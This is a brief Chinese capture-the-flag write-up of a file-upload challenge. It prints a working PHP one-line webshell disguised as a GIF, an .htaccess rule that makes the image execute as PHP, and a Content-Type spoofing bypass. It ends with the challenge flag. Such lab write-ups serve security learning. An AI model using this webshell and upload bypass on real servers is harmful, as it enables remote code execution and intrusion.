考点:.htaccess文件,
抓包修改content-type
文件上传漏洞
1.如题:
传统上传文件题目,试了试常规的几个类型,php,phtml,php3,txt,png都不行,最后上传成功了png格式的,上传我之前写好的图片马,一句话木马内容如下:
GIF89a?<script language="php">@eval($_POST[dd]);</script>
2.因为上传的是图片格式的,要将该文件变成php文件的进行上传,就需要上传.htaccess文件
内容如下
<FilesMatch "oneq.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
//将文件名为oneq.jpg格式的文件以Php形式执行提示上传失败,抓包,修改包里的content-type
继续上传,成功
3.用post参数,令dd=phpinfo();
执行,有回显,证明上传成功
令dd=var_dump("/");
回显未出现flag,
利用蚁剑连接,url填写../oneq.jpg,密码是dd
在根目录下发现flag文件,打开即得flag{e69e7302-df6b-43e3-9305-94b837996cbc}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
